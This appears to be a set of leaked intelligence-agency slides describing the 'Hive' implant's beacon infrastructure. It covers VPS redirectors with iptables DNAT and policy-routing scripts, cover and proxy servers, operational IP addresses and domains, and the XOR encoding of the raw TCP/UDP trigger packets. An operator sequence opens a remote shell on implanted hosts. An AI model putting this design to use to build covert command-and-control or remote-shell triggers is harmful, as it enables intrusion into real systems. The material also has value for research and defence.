SECRET//NOFORN

Hive Beacon Infrastructure

[Diagram: Linux-based infrastructure. Components shown: implanted hosts; VPS server running Apache with Mod Proxy and IPTABLES forwarding; proxy / VPN servers; cover server; DNS server; Blot 4.0; Honeycomb; RIPPER; SNAPPER; one-way transfer to a database; log files. Connections shown: SSL sessions over the OSN and VPN network connections.]

Hive Beacon Test Infrastructure

[Diagram with a numbered flow 1 to 6. Implanted hosts 10.6.5.191 (cover domain vhost1.edb.devlan.net) and 10.6.5.192 (cover domain vhost2.edb.devlan.net); VPS servers with IPTABLES forwarding, bridges br0, br1 and br2, tap interfaces tap010, tap011, tap020, tap021, tap030, tap031, tap032, tap040 and tap041, and addresses 172.16.63.1 and 172.16.63.2; VPN tunnels (10.177.77.1) to Blot at 172.16.63.101 on Beastbox, eth2 172.16.64.1; Cover Server 172.16.64.10 / 10.6.5.197 with address mapping 172.16.64.11: vhost1, 172.16.64.12: vhost2; Honeycomb Tool Handler 10.2.4.119; Command Post. Other addresses shown: 10.6.5.190, 10.6.5.196.]

VPS Proxy Port Redirection Map
Inbound    Redirected
80         8001
443        44301

Hive Beacon Test Infrastructure

[Diagram: same layout as the preceding slide, drawn with tap interfaces tap1, tap11, tap2, tap21, tap3, tap31, tap32, tap4 and tap41 and bridges br1 and br2. Implanted hosts 10.6.5.191 (target domain vhost1.edb.devlan.net) and 10.6.5.192 (target domain vhost2.edb.devlan.net); VPS addresses 172.16.63.1 and 172.16.63.2; VPN tunnels (10.177.77.1) to Blot 172.16.63.101 on Beastbox, eth2 172.16.64.1, eth0 10.6.5.196; Cover Server 172.16.64.10 / 10.6.5.197; Honeycomb Tool Handler 10.2.4.119.]

Cover Server Ports
172.16.64.11: vhost1
172.16.64.12: vhost2
...

Blot In-bound Ports
8001: vhost1    44301: vhost1
8002: vhost2    44302: vhost2
...

TOP SECRET//SI//NOFORN

Hive Beacon Operational Infrastructure

[Diagram. Implanted hosts with target domains playa-del-rio.com and viva-rio-engracado.com; VPS servers with IPTABLES forwarding (CentOS-5.6 32-bit), eth0 78.47.85.114/28 and 78.47.85.121/28, eth0 78.47.131.68/29 (gateway 78.47.131.65) and 88.198.156.226/29 (gateway 88.198.156.225), VPN tunnel side 10.177.77.1; VPN tunnels to Blot on Beastbox, eth0 91.93.104.178/25, eth1 172.24.5.132/23; Cover Server 172.24.5.141/23; Honeycomb Tool Handler 172.24.5.188/23 (CentOS-5.8 64-bit). Further OS labels shown: CentOS-5.8 64-bit, CentOS-5.6 32-bit.]

SinnerTwin Deployment Environment

[Diagram only; no labels recovered.]

Hive Operation

[Sequence diagram. Participants: hived on the implanted host, hclient / cutthroat on the ICON workstation, GENESIS, and an SSL session between them. Steps shown: hived in TriggerListen on its listening port; the operator runs "$ ./cutthroat ./hive" and then "> ilm connect <target IP>"; the Trigger is sent; hived performs fork_process (P, C) and start_triggered_connect; TriggerCallbackSession / call-back; StartClientSession; the operator runs "> shell open <client IP> <client port> <pw>"; launchShell (P, C); shell.]

Raw TCP/UDP Trigger

Hive 2.5 Algorithm

[Packet layout figure: 400 bytes, with offsets 0, 8 and 92 marked. Fields labelled: 8-byte random data; CRC random data of length CRC % 200; 1-byte XOR value; encoded 12-byte trigger; integer N x 127 PAD; 25-byte random data; 2-byte CRC; 12-byte random data PAD.]

The twelve-byte trigger is encoded by XORing the 1-byte XOR value with the first five bytes of the trigger, and the remaining trigger bytes are XORed with 0xB6.

Hive 2.6 Algorithm

[Packet layout figure: 126 bytes minimum / 472 bytes maximum, with offsets 0, 8 and 92 marked. Fields labelled: 8-byte random data; CRC random data of length CRC % 200; encoded 12-byte trigger; PAD1 (integer N x 127); PAD2 (8-byte); random data of length CRC % 146.]

The twelve-byte trigger is encoded by computing an offset of CRC % 72 into the CRC random data field and XORing each of the twelve following bytes with the corresponding byte of the twelve-byte trigger payload.

Scrap slides follow

SECRET//SI//NOFORN

Hive Beacon Lab Test Infrastructure

[Diagram with four columns: Implanted Hosts, VPS Servers, Proxy / Director, Response Servers. Implanted hosts: PowerPC (10.2.5.5, 00:0C:42:99:8A:E1), MIPSBE (10.2.5.6, 00:0C:42:4D:7B:DE), x86 (10.6.5.190, 52:54:00:9A:B0:72), sparc (eri0 10.2.5.5, 00:03:BA:86:6A:78) and a host on 10.6.5.192/24, on VLAN 65. VPS servers: 10.6.5.191/24 with eth1 172.16.63.1/24 and tun0 10.177.77.10, target domain domainA.com; 10.6.5.192/24 with 172.16.63.2/24, target domain domainB.com. Proxy / Director: Blot on Beastbox with eth1 172.16.63.101, eth2 172.16.64.1, tun0 10.177.77.1 and eth0 10.6.5.196; VPN tunnels from the VPS servers; bridges hive1 and hive2. Response servers: Cover Server 172.16.64.10 / 10.6.5.197; Honeycomb Tool Handler 172.16.64.100 / 10.6.5.198; Command Post 10.6.5.195/24 on VLAN 65. OS labels shown: CentOS-5.9, CentOS-6.3 32-bit, CentOS-6.2 64-bit.]

Hive Test Infrastructure

[Diagram with the same four-column layout as the preceding lab test slide (implanted hosts, VPS servers, Blot on Beastbox as proxy / director, Cover Server, Honeycomb Tool Handler and Command Post). Differences shown: the first VPS carries aliases eth1:1 .11 and eth1:2 .12 on 172.16.63.1/24; Blot carries alias eth1:1 172.16.63.102; the tun0 addresses are given as 10.177.77.a and 10.177.77.b; a further implanted host 10.6.5.193 (52:54:00:95:DA:16) is added.]

New Hive Test Infrastructure

[Diagram with four columns: Implanted Hosts, VPS Servers, Proxy / Director, Response Servers. Implanted hosts: PowerPC (10.2.5.5, 00:0C:42:99:8A:E1), MIPSBE (10.2.5.6, 00:0C:42:4D:7B:DE), sparc (eri0 10.2.5.5, 00:03:BA:86:6A:78), x86 implant1 (10.6.5.190, 52:54:00:9A:B0:72), implant2 (10.6.5.193, 52:54:00:95:DA:16) and 10.6.5.189, on VLAN 65. VPS servers: 10.6.5.191/24 with eth0 172.16.63.1/24 and aliases eth1:1 .11 (domainA.com) and eth1:2 .12 (domainB.com); 10.6.5.192/24 with 172.16.63.2/24 (target domain domainB.com). Proxy / Director: Nginx Proxy (SSL) with eth1 172.16.63.111, alias eth1:1 172.16.63.112 and eth2 172.16.64.2; bridges hive1 and hive2. Response servers: Cover Server 172.16.64.10 / 10.6.5.197; Honeycomb Tool Handler 172.16.64.100 / 10.6.5.198 with aliases eth1:1 .101 (domainA.com) and eth1:2 .102 (domainB.com); Command Post 10.6.5.195/24 on VLAN 65. OS labels shown: CentOS-6.2 64-bit, CentOS-6.3 64-bit, CentOS-6.4 64-bit.]

Policy routing script shown on the slide:

#!/bin/bash
# Script to configure policy routing
# Register two routing tables, hiveA (id 101) and hiveB (id 102), one entry per line
echo -e "101\thiveA" >> /etc/iproute2/rt_tables
echo -e "102\thiveB" >> /etc/iproute2/rt_tables
# Each table's default route points at 172.16.63.2
ip route add default via 172.16.63.2 table hiveA
ip route add default via 172.16.63.2 table hiveB
# Source-based rules: traffic from each alias address is looked up in its own table
ip rule add from 172.16.63.111 table hiveA prio 1
ip rule add from 172.16.63.112 table hiveB prio 1

Hive Beacon Test Infrastructure

[Diagram. VPS server with IPTABLES forwarding, eth0 10.3.2.174 and p3p2 172.16.63.1; a second VPS at 10.3.2.185 / 172.16.63.131. Implanted hosts with target domains vhost1.edb.devlan.net and vhost2.edb.devlan.net; other addresses shown 10.3.2.113 and 10.3.2.125. Blot Proxy 172.16.63.101 with VPN Server and Apache Server, 172.16.64.1; Cover Server 172.16.64.10; Honeycomb Tool Handler 10.2.4.119.]

VPS Server IPTABLES Configuration

# Default policies: drop everything that is not explicitly accepted
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP
# Management access to the VPS itself: SSH in, and its replies out
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT
# DNAT: inbound TCP 53, 80 and 443 on the eth0 address are redirected to Blot at 172.16.63.101:443
iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 53 -j DNAT --to-destination 172.16.63.101:443
iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 80 -j DNAT --to-destination 172.16.63.101:443
iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 443 -j DNAT --to-destination 172.16.63.101:443
# FORWARDING: pass the redirected connections from eth0 to p3p2, plus replies in both directions.
# Note: the FORWARD chain sees the packet after DNAT, so its destination port is already 443;
# the --dport 53 and --dport 80 rules never match and only the 443 rule admits new connections.
iptables -A FORWARD -i eth0 -o p3p2 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -i p3p2 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 53 -m state --state NEW -j ACCEPT
iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 80 -m state --state NEW -j ACCEPT
iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 443 -m state --state NEW -j ACCEPT
# SNAT: masquerade forwarded traffic as it leaves on p3p2
iptables -t nat -A POSTROUTING -o p3p2 -j MASQUERADE

Hive Beacon Test Infrastructure

[Diagram: the same layout as the preceding slide, drawn with tap interfaces tap1, tap11, tap2, tap21, tap3, tap31, tap32, tap4 and tap41 and bridges br1 and br2. Implanted hosts 10.6.5.191 (target domain vhost1.edb.devlan.net) and 10.6.5.192 (target domain vhost2.edb.devlan.net); VPS addresses 172.16.63.1 and 172.16.63.2; Blot Proxy 172.16.63.101 with VPN Server and Apache Server, 172.16.64.1 and 10.6.5.196; Cover Server 172.16.64.10 / 10.6.5.197; Honeycomb Tool Handler 10.2.4.119. The VPS Server IPTABLES Configuration on this slide repeats the one on the preceding slide.]


Hive Beacon Test Infrastructure

[Diagram: the same tap and bridge layout as the preceding slide, with Blot Proxy 172.16.63.101 (VPN Server, Apache Server), Cover Server 172.16.64.10 / 10.6.5.197 and Honeycomb Tool Handler 10.2.4.119, plus the two port tables.]

Cover Server Ports
172.16.64.11: vhost1
172.16.64.12: vhost2
...

Blot In-bound Ports
8001: vhost1    44301: vhost1
8002: vhost2    44302: vhost2
...